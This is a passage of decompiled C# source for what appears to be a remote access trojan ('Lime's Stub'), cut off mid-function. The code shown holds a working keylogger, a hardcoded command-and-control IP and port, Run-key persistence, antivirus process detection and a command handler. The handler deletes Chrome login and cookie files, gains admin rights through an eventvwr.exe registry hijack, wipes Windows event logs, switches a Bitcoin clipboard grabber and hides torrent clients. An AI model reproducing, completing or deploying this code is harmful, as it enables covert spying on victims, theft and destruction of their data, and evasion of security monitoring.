   goto end_IL_0001;
   IL_00ab:
   int num4 = num3 + 1;
   num3 = 0;
   switch (num4)
   {
   case 5:
    goto end_IL_0001;
   case 9:
    goto end_IL_0001;
   case 11:
    goto end_IL_0001;
   case 12:
    goto end_IL_0001;
   case 1:
    goto IL_0002;
   case 2:
    goto IL_000b;
   case 3:
    goto IL_0016;
   case 4:
    goto IL_0029;
   case 6:
    goto IL_0048;
   case 7:
    goto IL_0055;
   case 8:
    goto IL_0068;
   case 10:
    goto IL_0088;
   default:
    goto IL_0125;
   }
   IL_00eb:
   num3 = num2;
   if (num > -2)
   {
    goto IL_00f5;
   }
   goto IL_00f2;
   IL_00f2:
   int num5 = 1;
   goto IL_00f6;
   IL_00f5:
   num5 = num;
   goto IL_00f6;
   IL_00f6:
   switch (num5)
   {
   case 1:
    goto IL_00ab;
   default:
    goto IL_0125;
   }
   end_IL_0001:;
  }
  catch (object obj) when (obj is Exception & num != 0 & num3 == 0)
  {
   ProjectData.SetProjectError((Exception)obj);
   /*Error near IL_0123: Could not find block for branch target IL_00eb*/;
  }
  if (num3 != 0)
  {
   ProjectData.ClearProjectError();
  }
  return;
  IL_0125:
  throw ProjectData.CreateProjectError(-2146828237);
 }

 public static string GetFileNameFromURL(string URL)
 {
  try
  {
   return URL.Substring(checked(URL.LastIndexOf("/", StringComparison.Ordinal) + 1));
  }
  catch (Exception ex)
  {
   ProjectData.SetProjectError(ex);
   Exception ex2 = ex;
   ProjectData.ClearProjectError();
   return URL;
  }
 }

 public static bool IsUtorrent()
 {
  bool result;
  int num = default(int);
  int num3 = default(int);
  try
  {
   goto IL_0002;
   IL_0002:
   ProjectData.ClearProjectError();
   num = -2;
   goto IL_000b;
   IL_000b:
   int num2 = 2;
   if (File.Exists(Torrent.UTorrentLocalPath))
   {
    goto IL_001d;
   }
   goto IL_0025;
   IL_001d:
   num2 = 3;
   result = true;
   goto end_IL_0001;
   IL_0025:
   num2 = 5;
   result = false;
   goto end_IL_0001;
   IL_002d:
   int num4 = num3 + 1;
   num3 = 0;
   switch (num4)
   {
   case 6:
    goto end_IL_0001;
   case 1:
    goto IL_0002;
   case 2:
    goto IL_000b;
   case 3:
    goto IL_001d;
   case 4:
   case 5:
    goto IL_0025;
   default:
    goto IL_008f;
   }
   IL_0055:
   num3 = num2;
   if (num > -2)
   {
    goto IL_005f;
   }
   goto IL_005c;
   IL_005c:
   int num5 = 1;
   goto IL_0060;
   IL_005f:
   num5 = num;
   goto IL_0060;
   IL_0060:
   switch (num5)
   {
   case 1:
    goto IL_002d;
   default:
    goto IL_008f;
   }
   end_IL_0001:;
  }
  catch (object obj) when (obj is Exception & num != 0 & num3 == 0)
  {
   ProjectData.SetProjectError((Exception)obj);
   /*Error near IL_008d: Could not find block for branch target IL_0055*/;
  }
  if (num3 != 0)
  {
   ProjectData.ClearProjectError();
  }
  return result;
  IL_008f:
  throw ProjectData.CreateProjectError(-2146828237);
 }

 public static bool IsBitTorrent()
 {
  if (File.Exists(Torrent.BitLocalPath))
  {
   return true;
  }
  return false;
 }

 public static void SeedIt(string ClientPath, string LocalPath, string TorrentPath)
 {
  int num = default(int);
  int num3 = default(int);
  try
  {
   goto IL_0002;
   IL_0002:
   ProjectData.ClearProjectError();
   num = -2;
   goto IL_000b;
   IL_000b:
   int num2 = 2;
   ProcessStartInfo processStartInfo = new ProcessStartInfo();
   goto IL_0013;
   IL_0013:
   num2 = 3;
   processStartInfo.FileName = ClientPath;
   goto IL_001d;
   IL_001d:
   num2 = 4;
   processStartInfo.Arguments = "/" + LocalPath + " \"" + TorrentPath + "\"";
   goto IL_0051;
   IL_0051:
   num2 = 5;
   processStartInfo.CreateNoWindow = true;
   goto IL_005b;
   IL_005b:
   num2 = 6;
   processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
   goto IL_0065;
   IL_0065:
   num2 = 7;
   processStartInfo.ErrorDialog = false;
   goto IL_006f;
   IL_006f:
   num2 = 8;
   Process.GetProcessesByName("BitTorrent")[0].Kill();
   goto IL_0083;
   IL_0083:
   num2 = 9;
   Process.GetProcessesByName("uTorrent")[0].Kill();
   goto IL_0098;
   IL_0098:
   num2 = 10;
   Process process = Process.Start(processStartInfo);
   goto IL_00a3;
   IL_00a3:
   num2 = 11;
   if (ClientPath.Contains("uTorrent"))
   {
    goto IL_00b7;
   }
   goto IL_00c8;
   IL_00b7:
   num2 = 12;
   Torrent.HideIt("uTorrent");
   goto end_IL_0001;
   IL_00c8:
   num2 = 14;
   if (ClientPath.Contains("BitTorrent"))
   {
    goto IL_00dc;
   }
   goto end_IL_0001;
   IL_00dc:
   num2 = 15;
   Torrent.HideIt("BitTorrent");
   goto end_IL_0001;
   IL_00f0:
   int num4 = num3 + 1;
   num3 = 0;
   switch (num4)
   {
   case 13:
    goto end_IL_0001;
   case 16:
    goto end_IL_0001;
   case 17:
    goto end_IL_0001;
   case 1:
    goto IL_0002;
   case 2:
    goto IL_000b;
   case 3:
    goto IL_0013;
   case 4:
    goto IL_001d;
   case 5:
    goto IL_0051;
   case 6:
    goto IL_005b;
   case 7:
    goto IL_0065;
   case 8:
    goto IL_006f;
   case 9:
    goto IL_0083;
   case 10:
    goto IL_0098;
   case 11:
    goto IL_00a3;
   case 12:
    goto IL_00b7;
   case 14:
    goto IL_00c8;
   case 15:
    goto IL_00dc;
   default:
    goto IL_017e;
   }
   IL_0144:
   num3 = num2;
   if (num > -2)
   {
    goto IL_014e;
   }
   goto IL_014b;
   IL_014b:
   int num5 = 1;
   goto IL_014f;
   IL_014e:
   num5 = num;
   goto IL_014f;
   IL_014f:
   switch (num5)
   {
   case 1:
    goto IL_00f0;
   default:
    goto IL_017e;
   }
   end_IL_0001:;
  }
  catch (object obj) when (obj is Exception & num != 0 & num3 == 0)
  {
   ProjectData.SetProjectError((Exception)obj);
   /*Error near IL_017c: Could not find block for branch target IL_0144*/;
  }
  if (num3 != 0)
  {
   ProjectData.ClearProjectError();
  }
  return;
  IL_017e:
  throw ProjectData.CreateProjectError(-2146828237);
 }

 public static void HideIt(string TorrentClient)
 {
  int num = default(int);
  int num3 = default(int);
  try
  {
   goto IL_0002;
   IL_0002:
   ProjectData.ClearProjectError();
   num = -2;
   goto IL_000b;
   IL_000b:
   int num2 = 2;
   Thread.Sleep(1000);
   goto IL_0018;
   IL_0018:
   num2 = 3;
   Process[] processesByName = Process.GetProcessesByName(TorrentClient);
   goto IL_0021;
   IL_0021:
   num2 = 4;
   Torrent.ShowWindow(processesByName[0].MainWindowHandle.ToInt32(), 0);
   goto end_IL_0001;
   IL_003d:
   int num4 = num3 + 1;
   num3 = 0;
   switch (num4)
   {
   case 5:
    goto end_IL_0001;
   case 1:
    goto IL_0002;
   case 2:
    goto IL_000b;
   case 3:
    goto IL_0018;
   case 4:
    goto IL_0021;
   default:
    goto IL_009b;
   }
   IL_0061:
   num3 = num2;
   if (num > -2)
   {
    goto IL_006b;
   }
   goto IL_0068;
   IL_0068:
   int num5 = 1;
   goto IL_006c;
   IL_006b:
   num5 = num;
   goto IL_006c;
   IL_006c:
   switch (num5)
   {
   case 1:
    goto IL_003d;
   default:
    goto IL_009b;
   }
   end_IL_0001:;
  }
  catch (object obj) when (obj is Exception & num != 0 & num3 == 0)
  {
   ProjectData.SetProjectError((Exception)obj);
   /*Error near IL_0099: Could not find block for branch target IL_0061*/;
  }
  if (num3 != 0)
  {
   ProjectData.ClearProjectError();
  }
  return;
  IL_009b:
  throw ProjectData.CreateProjectError(-2146828237);
 }
}

// j.A
using j;
using System;

public class A
{
 [STAThread]
 public static void main()
 {
  OK.ko();
 }
}


// j.kl
using j;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;

public class kl
{
 private string LastAS;

 private int LastAV;

 private Keys lastKey;

 public string Logs;

 public string vn;

 public kl()
 {
  this.lastKey = Keys.None;
  this.Logs = "";
  this.vn = "[kl]";
 }

 private string AV()
 {
  try
  {
   IntPtr foregroundWindow = OK.GetForegroundWindow();
   int processId = default(int);
   kl.GetWindowThreadProcessId(foregroundWindow, ref processId);
   Process processById = Process.GetProcessById(processId);
   if (!((foregroundWindow.ToInt32() == this.LastAV & Operators.CompareString(this.LastAS, processById.MainWindowTitle, false) == 0) | processById.MainWindowTitle.Length == 0))
   {
    this.LastAV = foregroundWindow.ToInt32();
    this.LastAS = processById.MainWindowTitle;
    return "\r\n\u0001" + DateAndTime.Now.ToString("yy/MM/dd ") + processById.ProcessName + " " + this.LastAS + "\u0001\r\n";
   }
  }
  catch (Exception ex)
  {
   ProjectData.SetProjectError(ex);
   Exception ex2 = ex;
   ProjectData.SetProjectError(ex2);
   Exception ex3 = ex2;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  return "";
 }

 private string Fix(Keys k)
 {
  bool flag = OK.F.Keyboard.ShiftKeyDown;
  if (OK.F.Keyboard.CapsLock)
  {
   flag = (!flag && true);
  }
  string result;
  try
  {
   Keys keys = k;
   if (keys <= Keys.End)
   {
    if (keys <= Keys.Return)
    {
     switch (keys)
     {
     case Keys.Back:
      break;
     case Keys.Return:
      goto IL_0115;
     case Keys.Tab:
      return "[TAP]\r\n";
     default:
      goto IL_014f;
     }
     goto IL_00da;
    }
    if ((uint)(keys - 16) > 1u)
    {
     switch (keys)
     {
     case Keys.End:
      break;
     case Keys.Space:
      return " ";
     default:
      goto IL_014f;
     }
    }
   }
   else
   {
    if (keys <= Keys.RControlKey)
    {
     if (keys != Keys.Delete)
     {
      if ((uint)(keys - 112) > 11u && (uint)(keys - 160) > 3u)
      {
       goto IL_014f;
      }
      goto IL_00fd;
     }
     goto IL_00da;
    }
    if (keys != Keys.Shift && keys != Keys.Control && keys != Keys.Alt)
    {
     goto IL_014f;
    }
   }
   goto IL_00fd;
   IL_014f:
   checked
   {
    if (flag)
    {
     return kl.VKCodeToUnicode((uint)k).ToUpper();
    }
    result = kl.VKCodeToUnicode((uint)k);
    goto end_IL_0036;
   }
   IL_00da:
   return "[" + k.ToString() + "]";
   IL_0115:
   if (this.Logs.EndsWith("[ENTER]\r\n"))
   {
    return "";
   }
   return "[ENTER]\r\n";
   IL_00fd:
   return "";
   end_IL_0036:;
  }
  catch (Exception ex)
  {
   ProjectData.SetProjectError(ex);
   Exception ex2 = ex;
   ProjectData.SetProjectError(ex2);
   Exception ex3 = ex2;
   char c;
   if (flag)
   {
    c = Strings.ChrW((int)k);
    result = c.ToString().ToUpper();
    ProjectData.ClearProjectError();
    string result2 = result;
    ProjectData.ClearProjectError();
    return result2;
   }
   c = Strings.ChrW((int)k);
   result = c.ToString().ToLower();
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  return result;
 }

 [DllImport("user32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
 private static extern short GetAsyncKeyState(int a);

 [DllImport("user32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
 private static extern int GetKeyboardLayout(int a);

 [DllImport("user32.dll")]
 private static extern bool GetKeyboardState(byte[] a);

 [DllImport("user32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
 private static extern int GetWindowThreadProcessId(IntPtr a, ref int b);

 [DllImport("user32.dll")]
 private static extern uint MapVirtualKey(uint a, uint b);

 [DllImport("user32.dll")]
 private static extern int ToUnicodeEx(uint a, uint b, byte[] c, [Out] [MarshalAs(UnmanagedType.LPWStr)] StringBuilder d, int e, uint f, IntPtr g);

 private static string VKCodeToUnicode(uint a)
 {
  try
  {
   StringBuilder stringBuilder = new StringBuilder();
   byte[] array = new byte[255];
   if (!kl.GetKeyboardState(array))
   {
    return "";
   }
   uint b = kl.MapVirtualKey(a, 0u);
   int num = 0;
   IntPtr g = (IntPtr)kl.GetKeyboardLayout(kl.GetWindowThreadProcessId(OK.GetForegroundWindow(), ref num));
   kl.ToUnicodeEx(a, b, array, stringBuilder, 5, 0u, g);
   return stringBuilder.ToString();
  }
  catch (Exception ex)
  {
   ProjectData.SetProjectError(ex);
   Exception ex2 = ex;
   ProjectData.SetProjectError(ex2);
   Exception ex3 = ex2;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  return ((Enum)checked((int)a)).ToString();
 }

 public void WRK()
 {
  this.Logs = Conversions.ToString(RuntimeHelpers.GetObjectValue(OK.GTV(this.vn, "")));
  checked
  {
   try
   {
    int num = 0;
    while (true)
    {
     num++;
     int num2 = 0;
     do
     {
      if (kl.GetAsyncKeyState(num2) == -32767 & !OK.F.Keyboard.CtrlKeyDown)
      {
       Keys k = unchecked((Keys)num2);
       string text = this.Fix(k);
       if (text.Length > 0)
       {
        this.Logs += this.AV();
        this.Logs += text;
       }
       this.lastKey = k;
      }
      num2++;
     }
     while (num2 <= 255);
     if (num == 1000)
     {
      num = 0;
      int num3 = Conversions.ToInteger("20") * 1024;
      if (this.Logs.Length > num3)
      {
       this.Logs = this.Logs.Remove(0, this.Logs.Length - num3);
      }
      OK.STV(this.vn, this.Logs, RegistryValueKind.String);
     }
     Thread.Sleep(1);
    }
   }
   catch (Exception ex)
   {
    ProjectData.SetProjectError(ex);
    Exception ex2 = ex;
    ProjectData.SetProjectError(ex2);
    Exception ex3 = ex2;
    ProjectData.ClearProjectError();
    ProjectData.ClearProjectError();
   }
  }
 }
}


// j.OK
using j;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.VisualBasic.Devices;
using Microsoft.Win32;
using My;
using System;
using System.Diagnostics;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.IO.Compression;
using System.Net;
using System.Net.Sockets;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Text;
using System.Threading;
using System.Windows.Forms;

[StandardModule]
internal sealed class OK
{
 [Serializable]
 [CompilerGenerated]
 internal sealed class _Closure$__
 {
  public static readonly _Closure$__ $I;

  public static ParameterizedThreadStart $IR26-1;

  static _Closure$__()
  {
   _Closure$__.$I = new _Closure$__();
  }

  [DebuggerHidden]
  internal void _Lambda$__R26-1(object a0)
  {
   Clipboard.SetText(Conversions.ToString(a0));
  }
 }

 public static string BTC_ADD = "";

 public static bool BTC_EN = Conversions.ToBoolean("False");

 public static string SLP = "0";

 public static string TMOT = "10";

 private static byte[] b = new byte[5121];

 public static bool BD = Conversions.ToBoolean("False");

 public static TcpClient C = null;

 public static bool Cn = false;

 public static string DR = "AppData";

 public static string EXE = "Hardware.exe";

 public static Computer F = new Computer();

 public static FileStream FS;

 public static string H = "195.123.217.189";

 public static bool Idr = Conversions.ToBoolean("True");

 public static bool Anti_CH = Conversions.ToBoolean("False");

 public static bool IsF = Conversions.ToBoolean("True");

 public static bool USB_SP = Conversions.ToBoolean("False");

 public static bool Isu = Conversions.ToBoolean("True");

 public static kl kq = null;

 private static string lastcap = "";

 public static FileInfo LO = new FileInfo(Assembly.GetEntryAssembly().Location);

 private static MemoryStream MeM = new MemoryStream();

 public static object MT = null;

 public static string P = "10050";

 public static object PLG = null;

 public static string RG = "Hardware.exe";

 public static string sf = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";

 public static string VN = "Qk5FVC0=";

 public static string VR = "0.7.3";

 public static string Y = "firefox";

 public static bool BOT_KILL = Conversions.ToBoolean("False");

 public static bool HIDE_ME = Conversions.ToBoolean("False");

 public static bool Persis = Conversions.ToBoolean("True");

 [CompilerGenerated]
 [DebuggerStepThrough]
 private static void _Lambda__1(object a0)
 {
  OK.Ind((byte[])a0);
 }

 [DebuggerStepThrough]
 [CompilerGenerated]
 private static void _Lambda__2(object a0, SessionEndingEventArgs a1)
 {
  OK.ED();
 }

 public static string ACT()
 {
  string result;
  try
  {
   IntPtr foregroundWindow = OK.GetForegroundWindow();
   if (foregroundWindow == IntPtr.Zero)
   {
    return "";
   }
   string text = Strings.Space(checked(OK.GetWindowTextLength((long)foregroundWindow) + 1));
   OK.GetWindowText(foregroundWindow, ref text, text.Length);
   result = OK.ENB(ref text);
  }
  catch (Exception ex)
  {
   ProjectData.SetProjectError(ex);
   Exception ex2 = ex;
   ProjectData.SetProjectError(ex2);
   Exception ex3 = ex2;
   result = "";
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  return result;
 }

 public static string BS(ref byte[] B)
 {
  return Encoding.UTF8.GetString(B);
 }

 public static bool Cam()
 {
  checked
  {
   try
   {
    int num = 0;
    do
    {
     string text = null;
     short wDriver = (short)num;
     string text2 = Strings.Space(100);
     if (OK.capGetDriverDescriptionA(wDriver, ref text2, 100, ref text, 100))
     {
      return true;
     }
     num++;
    }
    while (num <= 4);
   }
   catch (Exception ex)
   {
    ProjectData.SetProjectError(ex);
    Exception ex2 = ex;
    ProjectData.SetProjectError(ex2);
    Exception ex3 = ex2;
    ProjectData.ClearProjectError();
    ProjectData.ClearProjectError();
   }
   return false;
  }
 }

 [DllImport("avicap32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
 public static extern bool capGetDriverDescriptionA(short wDriver, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszName, int cbName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVer, int cbVer);

 private static bool CompDir(FileInfo F1, FileInfo F2)
 {
  if (Operators.CompareString(F1.Name.ToLower(), F2.Name.ToLower(), false) == 0)
  {
   DirectoryInfo directoryInfo = F1.Directory;
   DirectoryInfo directoryInfo2 = F2.Directory;
   do
   {
    if (Operators.CompareString(directoryInfo.Name.ToLower(), directoryInfo2.Name.ToLower(), false) != 0)
    {
     return false;
    }
    directoryInfo = directoryInfo.Parent;
    directoryInfo2 = directoryInfo2.Parent;
    if (directoryInfo == null & directoryInfo2 == null)
    {
     return true;
    }
    if (directoryInfo == null)
    {
     return false;
    }
   }
   while (directoryInfo2 != null);
  }
  return false;
 }

 public static bool connect()
 {
  OK.Cn = false;
  Thread.Sleep(2000);
  FileInfo lO = OK.LO;
  lock (lO)
  {
   try
   {
    if (OK.C != null)
    {
     try
     {
      OK.C.Close();
      OK.C = null;
      Thread.Sleep(checked((int)Math.Round(Math.Round(Math.Round(unchecked(Conversions.ToDouble(OK.TMOT) * 1000.0))))));
     }
     catch (Exception ex)
     {
      ProjectData.SetProjectError(ex);
      Exception ex2 = ex;
      ProjectData.SetProjectError(ex2);
      Exception ex3 = ex2;
      ProjectData.ClearProjectError();
      ProjectData.ClearProjectError();
     }
    }
    try
    {
     OK.MeM.Dispose();
    }
    catch (Exception ex4)
    {
     ProjectData.SetProjectError(ex4);
     Exception ex5 = ex4;
     ProjectData.SetProjectError(ex5);
     Exception ex6 = ex5;
     ProjectData.ClearProjectError();
     ProjectData.ClearProjectError();
    }
   }
   catch (Exception ex7)
   {
    ProjectData.SetProjectError(ex7);
    Exception ex8 = ex7;
    ProjectData.SetProjectError(ex8);
    Exception ex9 = ex8;
    ProjectData.ClearProjectError();
    ProjectData.ClearProjectError();
   }
   try
   {
    OK.MeM = new MemoryStream();
    OK.C = new TcpClient();
    OK.C.ReceiveBufferSize = 204800;
    OK.C.SendBufferSize = 204800;
    OK.C.Client.SendTimeout = 10000;
    OK.C.Client.ReceiveTimeout = 10000;
    OK.C.Connect(OK.H, Conversions.ToInteger(OK.P));
    OK.Cn = true;
    OK.Send(OK.inf());
    try
    {
     string text = default(string);
     if (Operators.ConditionalCompareObjectEqual(RuntimeHelpers.GetObjectValue(OK.GTV("vn", "")), "", false))
     {
      text = text + OK.DEB(ref OK.VN) + "\r\n";
     }
     else
     {
      string str = text;
      string text2 = Conversions.ToString(RuntimeHelpers.GetObjectValue(OK.GTV("vn", "")));
      text = str + OK.DEB(ref text2) + "\r\n";
     }
     text = text + OK.H + ":" + OK.P + "\r\n" + OK.DR + "\r\n" + OK.EXE + "\r\n" + Conversions.ToString(OK.Idr) + "\r\n" + Conversions.ToString(OK.IsF) + "\r\n" + Conversions.ToString(OK.Isu) + "\r\n" + Conversions.ToString(OK.BD);
     OK.Send("inf" + OK.Y + OK.ENB(ref text));
    }
    catch (Exception ex10)
    {
     ProjectData.SetProjectError(ex10);
     Exception ex11 = ex10;
     ProjectData.SetProjectError(ex11);
     Exception ex12 = ex11;
     ProjectData.ClearProjectError();
     ProjectData.ClearProjectError();
    }
   }
   catch (Exception ex13)
   {
    ProjectData.SetProjectError(ex13);
    Exception ex14 = ex13;
    ProjectData.SetProjectError(ex14);
    Exception ex15 = ex14;
    OK.Cn = false;
    ProjectData.ClearProjectError();
    ProjectData.ClearProjectError();
   }
  }
  return OK.Cn;
 }

 public static string DEB(ref string s)
 {
  byte[] array = Convert.FromBase64String(s);
  return OK.BS(ref array);
 }

 public static void DLV(string n)
 {
  try
  {
   OK.F.Registry.CurrentUser.OpenSubKey("Software\\" + OK.RG, true).DeleteValue(n);
  }
  catch (Exception ex)
  {
   ProjectData.SetProjectError(ex);
   Exception ex2 = ex;
   ProjectData.SetProjectError(ex2);
   Exception ex3 = ex2;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
 }

 public static void ED()
 {
  OK.pr(0);
 }

 public static string ENB(ref string s)
 {
  return Convert.ToBase64String(OK.SB(ref s));
 }

 [DllImport("user32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
 public static extern IntPtr GetForegroundWindow();

 [DllImport("kernel32", CharSet = CharSet.Ansi, EntryPoint = "GetVolumeInformationA", ExactSpelling = true, SetLastError = true)]
 private static extern int GetVolumeInformation([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpRootPathName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpVolumeNameBuffer, int nVolumeNameSize, ref int lpVolumeSerialNumber, ref int lpMaximumComponentLength, ref int lpFileSystemFlags, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileSystemNameBuffer, int nFileSystemNameSize);

 [DllImport("user32.dll", CharSet = CharSet.Ansi, EntryPoint = "GetWindowTextA", ExactSpelling = true, SetLastError = true)]
 public static extern int GetWindowText(IntPtr hWnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string WinTitle, int MaxLength);

 public static string GetAntiVirus()
 {
  Process[] processes = Process.GetProcesses();
  int num = 0;
  checked
  {
   string text;
   do
   {
    string processName = processes[num].ProcessName;
    text = ((Operators.CompareString(processName, "ekrn", false) != 0) ? ((Operators.CompareString(processName, "avgcc", false) != 0) ? ((Operators.CompareString(processName, "avgnt", false) != 0) ? ((Operators.CompareString(processName, "QHWatchdog", false) != 0) ? ((Operators.CompareString(processName, "ahnsd", false) != 0) ? ((Operators.CompareString(processName, "bdss", false) != 0) ? ((Operators.CompareString(processName, "bdv", false) != 0) ? ((Operators.CompareString(processName, "clamav", false) != 0) ? ((Operators.CompareString(processName, "fpavserver", false) != 0) ? ((Operators.CompareString(processName, "fssm32", false) != 0) ? ((Operators.CompareString(processName, "avkcl", false) != 0) ? ((Operators.CompareString(processName, "engface", false) != 0) ? ((Operators.CompareString(processName, "avp", false) != 0) ? ((Operators.CompareString(processName, "updaterui", false) != 0) ? ((Operators.CompareString(processName, "msmpeng", false) != 0) ? ((Operators.CompareString(processName, "zanda", false) != 0) ? ((Operators.CompareString(processName, "npupdate", false) != 0) ? ((Operators.CompareString(processName, "inicio", false) != 0) ? ((Operators.CompareString(processName, "sagui", false) != 0) ? ((Operators.CompareString(processName, "savservice", false) != 0) ? ((Operators.CompareString(processName, "saswinlo", false) != 0) ? ((Operators.CompareString(processName, "spbbcsvc", false) != 0) ? ((Operators.CompareString(processName, "thd32", false) != 0) ? ((Operators.CompareString(processName, "ufseagnt", false) != 0) ? ((Operators.CompareString(processName, "dllhook", false) != 0) ? ((Operators.CompareString(processName, "sbamtray", false) != 0) ? ((Operators.CompareString(processName, "vrmonsvc", false) != 0) ? ((Operators.CompareString(processName, "dllhook", false) != 0) ? ((Operators.CompareString(processName, "vbcalrt", false) != 0) ? ((Operators.CompareString(processName, "aswUpdSv", false) != 0) ? "Not Found" : "Avast") : "VirusBuster") : "VBA32") : "ViRobot") : "VIPRE") : "VBA32") : "TrendMicro") : "TheHacker") : "Symantec") : "SUPERAntiSpyware") : "Sophos") : "Prevx") : "Panda") : "nProtect") : "Norman") : "microsoft security essentials") : "McAfee") : "Kaspersky") : "Jiangmin") : "GData") : "F-Secure") : "F-Prot") : "ClamAV") : "ByteHero") : "BitDefender") : "AhnLab-V3") : "Total Security 360") : "Avira") : "AVG") : "NOD32");
    int id = processes[num].Id;
    num++;
   }
   while (!(Operators.CompareString(text, "Not Found", false) != 0 | num > processes.Length - 1));
   if (num > processes.Length - 1)
   {
    text = "Not Found";
   }
   return text;
  }
 }

 [DllImport("user32.dll", CharSet = CharSet.Ansi, EntryPoint = "GetWindowTextLengthA", ExactSpelling = true, SetLastError = true)]
 public static extern int GetWindowTextLength(long hwnd);

 public static object GTV(string n, object ret)
 {
  object objectValue;
  try
  {
   objectValue = RuntimeHelpers.GetObjectValue(OK.F.Registry.CurrentUser.OpenSubKey("Software\\" + OK.RG).GetValue(n, RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(ret))));
  }
  catch (Exception ex)
  {
   ProjectData.SetProjectError(ex);
   Exception ex2 = ex;
   ProjectData.SetProjectError(ex2);
   Exception ex3 = ex2;
   objectValue = RuntimeHelpers.GetObjectValue(ret);
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  return objectValue;
 }

 public static string HWD()
 {
  string result;
  try
  {
   string text = null;
   int num = 0;
   int num2 = 0;
   string text2 = null;
   string text3 = Interaction.Environ("SystemDrive") + "\\";
   int number = default(int);
   OK.GetVolumeInformation(ref text3, ref text, 0, ref number, ref num, ref num2, ref text2, 0);
   result = Conversion.Hex(number);
  }
  catch (Exception ex)
  {
   ProjectData.SetProjectError(ex);
   Exception ex2 = ex;
   ProjectData.SetProjectError(ex2);
   Exception ex3 = ex2;
   result = "ERR";
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  return result;
 }

 [DllImport("user32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
 public static extern long SwapMouseButton(long bSwap);

 [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
 private static extern void SendMessage(int hWnd, uint msg, uint wParam, int lparam);

 [DllImport("user32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
 private static extern int SetWindowPos(int hwnd, int hWndInsertAfter, int x, int y, int cx, int cy, int wFlags);

 [DllImport("user32", CharSet = CharSet.Ansi, EntryPoint = "FindWindowA", ExactSpelling = true, SetLastError = true)]
 private static extern int FindWindow([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpClassName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpWindowName);

 [DllImport("user32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
 private static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

 [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
 public static void Ind(byte[] b)
 {
  string[] array = Strings.Split(OK.BS(ref b), OK.Y, -1, CompareMethod.Binary);
  try
  {
   string text = array[0];
   switch (<PrivateImplementationDetails>.ComputeStringHash(text))
   {
   case 1346747564u:
    if (Operators.CompareString(text, "seed", false) == 0)
    {
     Torrent.SeedTorrent(array[1]);
    }
    break;
   case 64384596u:
    if (Operators.CompareString(text, "delchrm", false) == 0)
    {
     try
     {
      Process[] processesByName = Process.GetProcessesByName("chrome");
      Process[] array2 = processesByName;
      foreach (Process process in array2)
      {
       process.Kill();
      }
     }
     catch (Exception ex)
     {
      ProjectData.SetProjectError(ex);
      Exception ex2 = ex;
      ProjectData.ClearProjectError();
     }
     Thread.Sleep(200);
     File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Login Data");
     File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Cookies");
    }
    break;
   case 1938327121u:
    if (Operators.CompareString(text, "GiveMeAdmin", false) == 0)
    {
     OK.pr(0);
     using (RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("Software\\Classes\\mscfile\\shell\\open\\command"))
     {
      registryKey.SetValue("", Application.ExecutablePath, RegistryValueKind.String);
     }
     Process.Start("eventvwr.exe");
     ProjectData.EndApp();
    }
    break;
   case 3883927432u:
    if (Operators.CompareString(text, "BitcoinON", false) == 0)
    {
     if (!OK.BTC_EN)
     {
      OK.Send("MSG" + OK.Y + "BitcoinGrabber was not checked when stub created!");
      return;
     }
     CallEveryXSeconds.Start();
    }
    break;
   case 2356653186u:
    if (Operators.CompareString(text, "BitcoinOFF", false) == 0)
    {
     if (!OK.BTC_EN)
     {
      OK.Send("MSG" + OK.Y + "BitcoinGrabber was not checked when stub created!");
      return;
     }
     CallEveryXSeconds.stopme();
    }
    break;
   case 2113050452u:
    if (Operators.CompareString(text, "EventLogs", false) == 0)
    {
     object current4 = WindowsIdentity.GetCurrent();
     object instance4 = new WindowsPrincipal((WindowsIdentity)current4);
     if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance4, null, "IsInRole", new object[1]
     {
      WindowsBuiltInRole.Administrator
     }, null, null, null)))
     {
      OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator");
     }
     else
     {
      EventLog eventLog = new EventLog();
      EventLog[] eventLogs = EventLog.GetEventLogs();
      foreach (EventLog eventLog in eventLogs)
      {
       eventLog.Clear();
       eventLog.Close();
      }
     }
    }
    break;
   case 3968740937u:
